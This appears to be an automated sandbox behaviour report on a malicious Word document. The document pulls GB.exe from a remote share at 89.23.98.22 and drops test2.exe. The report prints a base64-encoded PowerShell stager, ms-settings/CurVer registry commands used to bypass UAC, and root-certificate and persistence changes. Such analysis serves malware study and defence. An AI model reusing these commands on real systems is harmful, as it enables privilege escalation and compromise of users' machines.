"[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHk
AdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32
Source: 42#U0430.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\42#U0430.doc
Source: C:\Windows\explorer.exe | File opened: C:\Windows\system32\MsftEdit.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C5D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wextract.pdbH source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: wextract.pdb source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp, GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: wextract.pdbGCTL source: GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.391188462.000000001A59F000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorer
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHk
AdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMg
Source: test2.exe.4.dr | Static PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_000007FE895279AF push ebx; retf 11_2_000007FE895279DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_000007FE8952022D push eax; iretd 11_2_000007FE89520241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_000007FE895200BD pushad ; iretd 11_2_000007FE895200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_000007FE89520B8D push eax; ret 11_2_000007FE89520BA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_000007FE895F7F2D pushad ; retn 1C53h 11_2_000007FE895F7FB9

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\persistent2\test2.exeJump to dropped file
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (59 identical entries)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (13 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (89 identical entries)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2661
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3711
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6018
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 872
Source: \Device\Mup\89.23.98.22\LN\GB.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\persistent2\test2.exe
Source: C:\Windows\explorer.exe TID: 3336 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3360 | Thread sleep time: -660000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3676 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 | Thread sleep count: 3711 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 | Thread sleep count: 6018 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3784Thread sleep time: -1560000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo f "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('… (base64-encoded payload omitted)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "[system.text.encoding]::unicode.getstring([system.convert]::frombase64string('… (base64-encoded payload omitted)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "[system.text.encoding]::unicode.getstring([system.convert]::frombase64string('… (base64-encoded payload omitted)
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanSESSx
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: explorer.exe, 0000000E.00000002.633066156.0000000003B91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8%ProgramFiles%\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\GB.exe.Config
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \\89.23.98.22\LN\GB.exe.Config
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\LN
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\LN
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\LN
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\desktop.ini
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\putty.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\scandoc.exe
Source: C:\Windows\explorer.exe | File opened: \\89.23.98.22\ln\putty.exe
